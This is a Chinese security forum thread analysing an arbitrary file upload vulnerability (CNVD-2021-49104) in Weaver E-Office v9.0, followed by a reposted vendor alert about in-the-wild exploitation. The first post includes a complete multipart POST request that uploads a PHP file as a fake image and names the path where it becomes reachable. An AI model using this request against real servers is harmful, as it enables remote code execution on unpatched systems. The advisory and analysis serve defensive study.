安全矩阵

 找回密码
 立即注册
搜索
查看: 4627|回复: 1

漏洞预警:某 E-Office v9 被捕获的任意文件上传漏洞分析

[复制链接]

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2021-11-27 18:32:48 | 显示全部楼层 |阅读模式
原文链接:漏洞预警:某 E-Office v9 被捕获的任意文件上传漏洞分析

:漏洞描述




看朋友圈的时候发现都转发了一条漏洞预警

https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ




二:  漏洞影响



泛微 e-office v9.0



三:  漏洞复现




根据漏洞预警的图片修复描述来看一下源代码





存在漏洞的源代码位置,主要是源于 uploadType 参数设为 eoffice_logo 时,对文件没有校验,导致任意文件上传


调用方法 uploadPicture



构造请求上传文件即可



  1. POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
  2. Host: 127.0.0.1:7899
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Connection: close
  7. Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
  8. Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
  9. Content-Length: 193
  10. Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

  11. --e64bdf16c554bbc109cecef6451c26a4
  12. Content-Disposition: form-data; name="Filedata"; filename="test.php"
  13. Content-Type: image/jpeg

  14. <?php phpinfo();?>

  15. --e64bdf16c554bbc109cecef6451c26a4--
复制代码

上传成功后访问 /images/logo/logo-eoffice.php



回复

使用道具 举报

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
 楼主| 发表于 2021-11-27 18:36:02 | 显示全部楼层
本帖最后由 Grav1ty 于 2021-11-27 18:37 编辑

附 漏洞预警原文:泛微e-office未公开高危漏洞在野被广泛利用,企业需立即自查!

近日, 微步在线捕获泛微 e-office 上传漏洞在野利用:



经微步工程师分析,该漏洞为未公开漏洞 CNVD-2021-49104,该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行。如下为官方修复漏洞后的代码片段:



上图红色方框标注的即为补丁中新增的校验代码,可以看到对于上传文件后缀名进行了白名单校验,由于该漏洞利用门槛低危害较大,建议使用了相关系统的机构组织立即修复该漏洞。
此次受影响泛微 e-office 版本如下:
泛微e-office 版本
是否受影响
V9.0


并附原文代码图片:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:32 , Processed in 0.014846 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表